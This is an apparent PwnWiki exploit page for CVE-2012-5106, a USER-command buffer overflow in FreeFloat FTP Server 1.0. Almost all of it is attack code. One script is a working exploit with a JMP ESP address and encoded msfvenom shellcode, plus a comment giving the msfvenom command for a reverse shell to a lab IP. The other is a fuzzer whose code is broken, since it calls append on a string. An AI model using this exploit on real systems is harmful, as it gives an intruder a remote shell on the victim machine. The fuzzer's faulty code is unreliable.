Loading
0

CVE-2012-5106 FreeFloat FTP Server 1.0任意代码执行漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

freefloat-ftp.py

#!/usr/bin/python

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 774699DB   FFE4             JMP ESP

# bad characters \x00\x0a\x0d

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.123 LPORT=443 -f c EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -a x86 --platform windows

shellcode=("\xda\xd9\xd9\x74\x24\xf4\x58\x2b\xc9\xbd\x3a\x84\xb7\xdf\xb1"
"\x52\x31\x68\x17\x83\xc0\x04\x03\x52\x97\x55\x2a\x5e\x7f\x1b"
"\xd5\x9e\x80\x7c\x5f\x7b\xb1\xbc\x3b\x08\xe2\x0c\x4f\x5c\x0f"
"\xe6\x1d\x74\x84\x8a\x89\x7b\x2d\x20\xec\xb2\xae\x19\xcc\xd5"
"\x2c\x60\x01\x35\x0c\xab\x54\x34\x49\xd6\x95\x64\x02\x9c\x08"
"\x98\x27\xe8\x90\x13\x7b\xfc\x90\xc0\xcc\xff\xb1\x57\x46\xa6"
"\x11\x56\x8b\xd2\x1b\x40\xc8\xdf\xd2\xfb\x3a\xab\xe4\x2d\x73"
"\x54\x4a\x10\xbb\xa7\x92\x55\x7c\x58\xe1\xaf\x7e\xe5\xf2\x74"
"\xfc\x31\x76\x6e\xa6\xb2\x20\x4a\x56\x16\xb6\x19\x54\xd3\xbc"
"\x45\x79\xe2\x11\xfe\x85\x6f\x94\xd0\x0f\x2b\xb3\xf4\x54\xef"
"\xda\xad\x30\x5e\xe2\xad\x9a\x3f\x46\xa6\x37\x2b\xfb\xe5\x5f"
"\x98\x36\x15\xa0\xb6\x41\x66\x92\x19\xfa\xe0\x9e\xd2\x24\xf7"
"\xe1\xc8\x91\x67\x1c\xf3\xe1\xae\xdb\xa7\xb1\xd8\xca\xc7\x59"
"\x18\xf2\x1d\xcd\x48\x5c\xce\xae\x38\x1c\xbe\x46\x52\x93\xe1"
"\x77\x5d\x79\x8a\x12\xa4\xea\x75\x4a\xa7\x93\x1d\x89\xa7\x62"
"\x65\x04\x41\x0e\x89\x41\xda\xa7\x30\xc8\x90\x56\xbc\xc6\xdd"
"\x59\x36\xe5\x22\x17\xbf\x80\x30\xc0\x4f\xdf\x6a\x47\x4f\xf5"
"\x02\x0b\xc2\x92\xd2\x42\xff\x0c\x85\x03\x31\x45\x43\xbe\x68"
"\xff\x71\x43\xec\x38\x31\x98\xcd\xc7\xb8\x6d\x69\xec\xaa\xab"
"\x72\xa8\x9e\x63\x25\x66\x48\xc2\x9f\xc8\x22\x9c\x4c\x83\xa2"
"\x59\xbf\x14\xb4\x65\xea\xe2\x58\xd7\x43\xb3\x67\xd8\x03\x33"
"\x10\x04\xb4\xbc\xcb\x8c\xd4\x5e\xd9\xf8\x7c\xc7\x88\x40\xe1"
"\xf8\x67\x86\x1c\x7b\x8d\x77\xdb\x63\xe4\x72\xa7\x23\x15\x0f"
"\xb8\xc1\x19\xbc\xb9\xc3")

buffer = "A" * 230 + "\xdb\x99\x46\x77" + "\x90" * 20 + shellcode + "C" * (800-230-351-16)

try:
	print "\nSending evil buffer..."
	s.connect(("192.168.1.131", 21))
	s.recv(1024)
	s.send('USER ' + buffer + '\r\n')
	data = s.recv(1024)
	print "\nDone!."
except:
	print "Could not connect to FTP!"

ftp-user-fuzz.py

#!/usr/bin/python

import socket



buffer = "A"
counter=100

while len(buffer) < 30:
	buffer.append("A"*counter)
	counter=counter+200

for string in buffer:
	print "Fuzzing USER with %s bytes" % len(string)
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect = s.connect(("192.168.1.131", 21))
	s.recv(1024)
	s.send('USER ' + string + '\r\n')
	s.send('QUIT\r\n')
	s.close()

免费、自由、人人可编辑的漏洞库